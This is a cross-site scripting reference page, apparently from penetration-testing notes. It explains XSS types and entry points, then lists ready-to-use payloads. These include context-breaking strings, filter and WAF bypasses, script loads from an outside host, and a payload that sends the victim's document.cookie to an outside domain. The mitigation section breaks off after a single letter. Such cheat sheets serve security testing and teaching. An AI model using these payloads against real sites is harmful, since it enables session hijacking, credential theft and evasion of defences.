XSS

XSS (Cross Site Scripting) is a client-side code injection attack where an attacker can execute malicious scripts in the web browser.

Impact

  • Account Hijacking: Attackers could steal session cookies and take over victim's session. It could lead to administrative access in case of an administrator account hijack.

  • Credential Theft: Theft of credentials such as passwords from a login page clone.

  • Data Leakage: Personally identifiable information (PII) such as credit card number, SSN, or any data stored in the browser could be accessed.

  • Redirect to malicious webpages, keylogging, downloading malware.

  • Access geolocation, webcam, miccrophone, and files on system.

There are 3 types of XSS:

  • Reflected (Non-persistent)

  • Stored (Persistent)

  • DOM-based

Reflected (Non-Persistent)

When the payload is part of the request that is sent to the server and is reflected back in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized properly, it could execute JS code.

Stored (Persistent)

When the payload passed to the web application is stored on the server and executes when rendered elsewhere.

For example, payloads could be saved as comments on a page and then when the comments are loaded, it could execute JS code.

DOM-based

DOM objects are manipulated to execute malicious code. This is an advanced attack as the payload never reaches the WAFs and executes on the client-side.

For example, the "document.write(document.URL)" could be used to retrieve malicious contents of some malicious site and execute it.

Entry Points

Any user-controlled parameter such as:

  • Input fields

  • Host Headers, Referer

  • URL redirection

  • URI parameters

  • File Upload (File name)

# Payloads

Popular

<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>

Polyglots:
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Context Breaking

HTML Context

Case: <tag> Searched for $input </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; <script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Bypassing

Without Event Handlers

<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>

Without Space

<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>

Without Slash (/)

<svg onload=confirm()>
<img src=x onerror=confirm()>

Without closing angular bracket (>)

<svg onload=confirm()//
<svg onload=alert(1)<!--

Without alert, confirm, prompt

<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>

Without a Valid HTML tag

<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it

Mitigation

  • L

PreviousNoSQL InjectionNextCSRF

Last updated